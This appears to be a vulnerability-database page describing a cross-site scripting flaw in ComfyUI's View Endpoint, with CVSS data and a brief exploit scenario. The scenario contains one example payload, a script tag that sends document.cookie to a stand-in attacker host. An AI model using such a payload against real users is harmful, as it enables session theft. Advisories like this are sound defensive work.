EUVD-2026-23739
GHSA-643x-95vv-2wf6
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
9DescriptionCVE.org
A vulnerability was found in ComfyUI up to 0.13.0. Affected by this issue is some unknown functionality of the file server.py of the component View Endpoint. Performing a manipulation results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.
AnalysisAI
Cross-site scripting (XSS) in ComfyUI up to version 0.13.0 allows authenticated remote attackers to inject malicious scripts through the View Endpoint in server.py, affecting user integrity with publicly available exploit code. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting its severity despite network accessibility. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires: (1) Authenticated access to ComfyUI (PR:L) - the attacker or a collaborator must have a valid login account; (2) User interaction (UI:R) - the victim must click a link or view a page containing the malicious payload, either directly or by navigating to an attacker-controlled project or shared resource; (3) The View Endpoint must be enabled and accessible (typical default configuration); (4) The victim's browser must execute JavaScript (no special browser extensions or protections disabling scripts). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Despite the low CVSS score of 3.5, this vulnerability carries moderate practical risk due to public exploit availability and authenticated access requirements. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An authenticated ComfyUI user logs into a shared ComfyUI instance. The attacker crafts a malicious URL or parameter containing JavaScript code (e.g., by manipulating the View Endpoint with a payload like <script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>) and shares it via social engineering or stores it in a project file. … |
| Remediation | No vendor-released patch has been identified at time of analysis, as ComfyUI's maintainers did not respond to early disclosure. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today